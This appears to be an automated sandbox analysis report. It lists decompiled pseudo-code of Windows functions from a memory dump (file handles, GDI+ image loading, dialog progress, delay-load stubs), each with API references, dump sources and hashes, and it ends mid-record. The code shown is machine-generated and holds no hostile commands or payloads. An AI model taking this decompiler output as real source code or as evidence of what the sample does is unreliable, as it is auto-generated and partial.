                                                                            				if( *(__ecx + 4) != 0xffffffff) {
                                                                            					if( *((char*)(__ecx + 0x10)) == 0 &&  *((intOrPtr*)(__ecx + 0xc)) == 0) {
                                                                            						_t5 = FindCloseChangeNotification( *(__ecx + 4)) - 1; // -1
                                                                            						asm("sbb bl, bl");
                                                                            						_t16 =  ~_t5 + 1;
                                                                            					}
                                                                            					 *(_t21 + 4) =  *(_t21 + 4) | 0xffffffff;
                                                                            				}
                                                                            				 *(_t21 + 0xc) =  *(_t21 + 0xc) & 0x00000000;
                                                                            				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x14)) != _t16) {
                                                                            					E00196C7B(0x1d00e0, _t21 + 0x1e);
                                                                            				}
                                                                            				return _t16;
                                                                            			}






                                                                            APIs
                                                                            • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,001994AA), ref: 001994F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ChangeCloseFindNotification
                                                                            • String ID:
                                                                            • API String ID: 2591292051-0
                                                                            • Opcode ID: 6fdd172746ac8ebc648f5bd6b11e78a725175d8545cac39f2a97ec2309ca8246
                                                                            • Instruction ID: cff84a08646ca7d2de8cc38d5d09d92ed322c51a7f9fbaf5298b5d41a812f350
                                                                            • Opcode Fuzzy Hash: 6fdd172746ac8ebc648f5bd6b11e78a725175d8545cac39f2a97ec2309ca8246
                                                                            • Instruction Fuzzy Hash: 9DF05E70442B045EEF318A288549B97B7E89B16735F048B5FE0EA439E09375A88D8B10
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 58%
                                                                            			E0019A1B1(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                            				void* _t12;
                                                                            				intOrPtr _t20;
                                                                            
                                                                            				_t20 = _a8;
                                                                            				 *((char*)(_t20 + 0x1044)) = 0;
                                                                            				if(E0019B5E5(_a4) == 0) {
                                                                            					_t12 = E0019A2DF(__edx, 0xffffffff, _a4, _t20);
                                                                            					if(_t12 == 0xffffffff) {
                                                                            						goto L1;
                                                                            					}
                                                                            					FindClose(_t12); // executed
                                                                            					 *(_t20 + 0x1040) =  *(_t20 + 0x1040) & 0x00000000;
                                                                            					 *((char*)(_t20 + 0x100c)) = E00199ECD( *((intOrPtr*)(_t20 + 0x1008)));
                                                                            					 *((char*)(_t20 + 0x100d)) = E00199EE5( *((intOrPtr*)(_t20 + 0x1008)));
                                                                            					return 1;
                                                                            				}
                                                                            				L1:
                                                                            				return 0;
                                                                            			}






                                                                            APIs
                                                                            • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0019A1E0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CloseFind
                                                                            • String ID:
                                                                            • API String ID: 1863332320-0
                                                                            • Opcode ID: b26edf037bf67fd8d81b51fafca0d04f7ebec3e633cdc2de6523a47ce2f8e8da
                                                                            • Instruction ID: 37f4955d0f84fa702a657aa2db80c6cec29cb4c3b94304b81ed6dfb691c2b79b
                                                                            • Opcode Fuzzy Hash: b26edf037bf67fd8d81b51fafca0d04f7ebec3e633cdc2de6523a47ce2f8e8da
                                                                            • Instruction Fuzzy Hash: 5EF08235408780ABCE225BB84804BD7BBA16F26331F148A4DF1FD12192C7766099D762
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 75%
                                                                            			E001A02E8() {
                                                                            				void* __esi;
                                                                            				void* _t2;
                                                                            
                                                                            				E001A0FAF(); // executed
                                                                            				_t2 = E001A0FB4();
                                                                            				if(_t2 != 0) {
                                                                            					_t2 = E00196CC9(_t2, 0x1d00e0, 0xff, 0xff);
                                                                            				}
                                                                            				if( *0x1d00eb != 0) {
                                                                            					_t2 = E00196CC9(_t2, 0x1d00e0, 0xff, 0xff);
                                                                            				}
                                                                            				__imp__SetThreadExecutionState(1);
                                                                            				return _t2;
                                                                            			}






                                                                            APIs
                                                                            • SetThreadExecutionState.KERNEL32 ref: 001A031D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ExecutionStateThread
                                                                            • String ID:
                                                                            • API String ID: 2211380416-0
                                                                            • Opcode ID: 3d476ee6ea029ed1b1095ec87ff30c8adb49113c58d641cfbfca63bb8c88f339
                                                                            • Instruction ID: cba1b2d3111f23a80d312a215c3a4b4e3fa44b04af91c9be77ecb62a00d588af
                                                                            • Opcode Fuzzy Hash: 3d476ee6ea029ed1b1095ec87ff30c8adb49113c58d641cfbfca63bb8c88f339
                                                                            • Instruction Fuzzy Hash: 7CD02B14B021502BDF23732429057FE06065FDF360F08002BF049363C78B590CCA83B1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 68%
                                                                            			E001A95CF(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                            				signed int _v8;
                                                                            				void* _t6;
                                                                            
                                                                            				_push(__ecx);
                                                                            				_push(0x10);
                                                                            				L001AD7F6();
                                                                            				_v8 = __eax;
                                                                            				if(__eax == 0) {
                                                                            					return 0;
                                                                            				}
                                                                            				_t6 = E001A938E(__eax, _a4, _a8); // executed
                                                                            				return _t6;
                                                                            			}






                                                                            APIs
                                                                            • GdipAlloc.GDIPLUS(00000010), ref: 001A95D5
                                                                              • Part of subcall function 001A938E: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 001A93AF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Gdip$AllocBitmapCreateFromStream
                                                                            • String ID:
                                                                            • API String ID: 1915507550-0
                                                                            • Opcode ID: c2a80f1359858ca97af3cccb572868f2337aa7eea0f8eb62410b7628bddc2cae
                                                                            • Instruction ID: d1510ff569ff4ed2b439f71048f7bec12781427a40a1012459debf6c138f0cab
                                                                            • Opcode Fuzzy Hash: c2a80f1359858ca97af3cccb572868f2337aa7eea0f8eb62410b7628bddc2cae
                                                                            • Instruction Fuzzy Hash: BAD0A73860410D7BDF56BA749C03E7E7A98EF12310F008066BC05C5141FF71DD50A291
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00199745(void* __ecx) {
                                                                            				long _t3;
                                                                            
                                                                            				if( *(__ecx + 4) != 0xffffffff) {
                                                                            					_t3 = GetFileType( *(__ecx + 4)); // executed
                                                                            					if(_t3 == 2 || _t3 == 3) {
                                                                            						return 1;
                                                                            					} else {
                                                                            						return 0;
                                                                            					}
                                                                            				} else {
                                                                            					return 0;
                                                                            				}
                                                                            			}





                                                                            APIs
                                                                            • GetFileType.KERNELBASE(000000FF,00199683), ref: 00199751
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: FileType
                                                                            • String ID:
                                                                            • API String ID: 3081899298-0
                                                                            • Opcode ID: 803daeab26645a76606b5a9e0bfa7de39f94f31c3e03e96ab7a570005a34b9b8
                                                                            • Instruction ID: 9976ba9d03f0381a5e650fa72c6a71892fcc78f00280ff0d64ba031a14544843
                                                                            • Opcode Fuzzy Hash: 803daeab26645a76606b5a9e0bfa7de39f94f31c3e03e96ab7a570005a34b9b8
                                                                            • Instruction Fuzzy Hash: CDD01230131300968F291E7C4E090567B569F43766738C6A8E025C40B1CB32C843F941
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E001AC9FE(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                            				void* _t7;
                                                                            
                                                                            				SendDlgItemMessageW( *0x1d75c8, 0x6a, 0x402, E0019F749(_a20, _a24, _a28, _a32), 0); // executed
                                                                            				_t7 = E001AA388(); // executed
                                                                            				return _t7;
                                                                            			}





                                                                            APIs
                                                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 001ACA23
                                                                              • Part of subcall function 001AA388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001AA399
                                                                              • Part of subcall function 001AA388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001AA3AA
                                                                              • Part of subcall function 001AA388: IsDialogMessageW.USER32(0019004A,?), ref: 001AA3BE
                                                                              • Part of subcall function 001AA388: TranslateMessage.USER32(?), ref: 001AA3CC
                                                                              • Part of subcall function 001AA388: DispatchMessageW.USER32(?), ref: 001AA3D6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                            • String ID:
                                                                            • API String ID: 897784432-0
                                                                            • Opcode ID: aa214c63b978f8c2c7c4416810a9e63ffb9b004ca62f9c99fbf7f1917e8e9859
                                                                            • Instruction ID: fdadb8bcfcd8c14add89f88402e82ba55b83b80a34fd1c00abcfeee9298569a3
                                                                            • Opcode Fuzzy Hash: aa214c63b978f8c2c7c4416810a9e63ffb9b004ca62f9c99fbf7f1917e8e9859
                                                                            • Instruction Fuzzy Hash: 51D09E35145300BADB022B51DE06F1A7BB2BF9CF04F404558B245740F187629D619B12
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 58%
                                                                            			E001AD1BF() {
                                                                            				void* _t3;
                                                                            				void* _t4;
                                                                            				void* _t8;
                                                                            				void* _t9;
                                                                            				void* _t10;
                                                                            
                                                                            				_push(_t4);
                                                                            				E001AD53A(_t3, _t4, _t8, _t9, _t10, 0x1cab6c, 0x1cdf10); // executed
                                                                            				goto __eax;
                                                                            			}








                                                                            0x001ad1ae
                                                                            0x001ad1b6
                                                                            0x001ad1bd

                                                                            APIs
                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001AD1B6
                                                                              • Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
                                                                              • Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                            • String ID:
                                                                            • API String ID: 1269201914-0
                                                                            • Opcode ID: 22a7b4a80602c29099b73527435ba6043c5d75c1320227eccdc9cbd2e867e901
                                                                            • Instruction ID: f8031f64ad2b08f98b099cdbadf642763a680cc7a7c203bc7485342a98cd77c6
                                                                            • Opcode Fuzzy Hash: 22a7b4a80602c29099b73527435ba6043c5d75c1320227eccdc9cbd2e867e901
                                                                            • Instruction Fuzzy Hash: 99B0128D758400AC310D61547D02F36025CE4E3B18770842EF007C0488DB40DD011033
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 58%
                                                                            			E001AD1A4() {
                                                                            				void* _t3;
                                                                            				void* _t4;
                                                                            				void* _t8;
                                                                            				void* _t9;
                                                                            				void* _t10;
                                                                            
                                                                            				_push(_t4);
                                                                            				E001AD53A(_t3, _t4, _t8, _t9, _t10, 0x1cab6c, 0x1cdf08); // executed
                                                                            				goto __eax;
                                                                            			}








                                                                            0x001ad1ae
                                                                            0x001ad1b6
                                                                            0x001ad1bd

                                                                            APIs
                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001AD1B6
                                                                              • Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
                                                                              • Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                            • String ID:
                                                                            • API String ID: 1269201914-0
                                                                            • Opcode ID: 1e91e4bdd96f812f3e3ade034de46815181dd6a77279073256b757f74a0916b8
                                                                            • Instruction ID: 69352ef582a68737674d7b97619e029fad43341c2d0e3e0ea8d265ba987c480d
                                                                            • Opcode Fuzzy Hash: 1e91e4bdd96f812f3e3ade034de46815181dd6a77279073256b757f74a0916b8
                                                                            • Instruction Fuzzy Hash: C4B0128D798508BC310D3100FE02E36021DD5E2B18771812EF003D0480DF40ED410033
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 58%
                                                                            			E001AD1DD() {
                                                                            				void* _t3;
                                                                            				void* _t4;
                                                                            				void* _t8;
                                                                            				void* _t9;
                                                                            				void* _t10;
                                                                            
                                                                            				_push(_t4);
                                                                            				E001AD53A(_t3, _t4, _t8, _t9, _t10, 0x1cab6c, 0x1cdf04); // executed
                                                                            				goto __eax;
                                                                            			}








                                                                            0x001ad1ae
                                                                            0x001ad1b6
                                                                            0x001ad1bd

                                                                            APIs
                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001AD1B6
                                                                              • Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
                                                                              • Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                            • String ID:
                                                                            • API String ID: 1269201914-0
                                                                            • Opcode ID: 1b42dc28853c382ba8df6935be30b3f7a0d63f665e66ddbb369e8653bc1e0986
                                                                            • Instruction ID: 05017204dc0fa854d7dbaaa4beb4a314dca5d4854da1416ed69bebdf43aa26a1
                                                                            • Opcode Fuzzy Hash: 1b42dc28853c382ba8df6935be30b3f7a0d63f665e66ddbb369e8653bc1e0986
                                                                            • Instruction Fuzzy Hash: E1B0128D758400AC310D61047E02F36025CD4E2B18770802EF007C1440DB41ED020033
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 58%
                                                                            			E001AD1C9() {
                                                                            				void* _t3;
                                                                            				void* _t4;
                                                                            				void* _t8;
                                                                            				void* _t9;
                                                                            				void* _t10;
                                                                            
                                                                            				_push(_t4);
                                                                            				E001AD53A(_t3, _t4, _t8, _t9, _t10, 0x1cab6c, 0x1cdf0c); // executed
                                                                            				goto __eax;
                                                                            			}








                                                                            0x001ad1ae
                                                                            0x001ad1b6
                                                                            0x001ad1bd

                                                                            APIs
                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001AD1B6
                                                                              • Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
                                                                              • Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                            • String ID:
                                                                            • API String ID: 1269201914-0
                                                                            • Opcode ID: f603e8f825d2d206a64b0b49722be3db7eac10588527f24208a2914d51c5efe5
                                                                            • Instruction ID: 9b85ed86515359507018a8df8cb9b49f40c2ca898eb2e8357477f9f0c769165b
                                                                            • Opcode Fuzzy Hash: f603e8f825d2d206a64b0b49722be3db7eac10588527f24208a2914d51c5efe5
                                                                            • Instruction Fuzzy Hash: 07B0128D758400AC310D61047D12F36036CD4E2B18770C02EF407C1440DB40ED010133
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 58%
                                                                            			E001AD205() {
                                                                            				void* _t3;
                                                                            				void* _t4;
                                                                            				void* _t8;
                                                                            				void* _t9;
                                                                            				void* _t10;
                                                                            
                                                                            				_push(_t4);
                                                                            				E001AD53A(_t3, _t4, _t8, _t9, _t10, 0x1cab8c, 0x1cdff8); // executed
                                                                            				goto __eax;
                                                                            			}








                                                                            0x001ad20f
                                                                            0x001ad217
                                                                            0x001ad21e

                                                                            APIs
                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001AD217
                                                                              • Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
                                                                              • Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                            • String ID:
                                                                            • API String ID: 1269201914-0
                                                                            • Opcode ID: 5b702acc4f55a2d2ad7542cf543f1e16e0ce4ca28ed5a8abbc1e5c3f5e66f34e
                                                                            • Instruction ID: 02d89a5ecabb558b706dbb30c99651bc44c36fdaba7ee2a5bf22eb16310ba773
                                                                            • Opcode Fuzzy Hash: 5b702acc4f55a2d2ad7542cf543f1e16e0ce4ca28ed5a8abbc1e5c3f5e66f34e
                                                                            • Instruction Fuzzy Hash: 53B012CD298504BC310951447D02F3A131DE5F2F3C330816FF013D0484DB40DD410032
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 58%
                                                                            			E001AD23E() {
                                                                            				void* _t3;
                                                                            				void* _t4;
                                                                            				void* _t8;
                                                                            				void* _t9;
                                                                            				void* _t10;
                                                                            
                                                                            				_push(_t4);
                                                                            				E001AD53A(_t3, _t4, _t8, _t9, _t10, 0x1cab8c, 0x1cdff0); // executed
                                                                            				goto __eax;
                                                                            			}








                                                                            0x001ad20f
                                                                            0x001ad217
                                                                            0x001ad21e

                                                                            APIs
                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001AD217
                                                                              • Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
                                                                              • Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                            • String ID:
                                                                            • API String ID: 1269201914-0
                                                                            • Opcode ID: a42ad6d7ff71f163ce500babe8bf21baf3778cfe8212a77c62040ac35733b41a
                                                                            • Instruction ID: 5deb6a2db9043e11ec3e58ed033756db4c25c93b4c0714963c64f4d292dbdd2d
                                                                            • Opcode Fuzzy Hash: a42ad6d7ff71f163ce500babe8bf21baf3778cfe8212a77c62040ac35733b41a
                                                                            • Instruction Fuzzy Hash: 2DB012DD298400AC310991487D02F3A035DF4F2B3C330806FF007C1444DB40DD010032
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 58%
                                                                            			E001AD234() {
                                                                            				void* _t3;
                                                                            				void* _t4;
                                                                            				void* _t8;
                                                                            				void* _t9;
                                                                            				void* _t10;
                                                                            
                                                                            				_push(_t4);
                                                                            				E001AD53A(_t3, _t4, _t8, _t9, _t10, 0x1cab8c, 0x1cdffc); // executed
                                                                            				goto __eax;
                                                                            			}








                                                                            0x001ad20f
                                                                            0x001ad217
                                                                            0x001ad21e

                                                                            APIs
                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001AD217
                                                                              • Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
                                                                              • Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                            • String ID:
                                                                            • API String ID: 1269201914-0
                                                                            • Opcode ID: 1d7b93b9f39fef55c8d1c30af49a468aad20e12b95b8a814cf0359a2034f1006
                                                                            • Instruction ID: cff50927e2cb3fed30f7c16516280b2d9924ba7aaf8b3061291f9a2d671e4a9f
                                                                            • Opcode Fuzzy Hash: 1d7b93b9f39fef55c8d1c30af49a468aad20e12b95b8a814cf0359a2034f1006
                                                                            • Instruction Fuzzy Hash: F6B012CD298400AC310991487D12F3A035DE4F2B3C330C06FF407C1840DB40DD010032
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 58%
                                                                            			E001AD7DA() {
                                                                            				void* _t3;
                                                                            				void* _t4;
                                                                            				void* _t8;
                                                                            				void* _t9;
                                                                            				void* _t10;
                                                                            
                                                                            				_push(_t4);
                                                                            				E001AD53A(_t3, _t4, _t8, _t9, _t10, 0x1cabcc, 0x1cdeb4); // executed
                                                                            				goto __eax;
                                                                            			}









                                                                            APIs
                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 001AD7EC
                                                                              • Part of subcall function 001AD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001AD5B7
                                                                              • Part of subcall function 001AD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001AD5C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                            • String ID:
                                                                            • API String ID: 1269201914-0
                                                                            • Opcode ID: 2dae7965357db39d73c8d1089937e15b4173d90e924fdc138782c3256ecf4e46
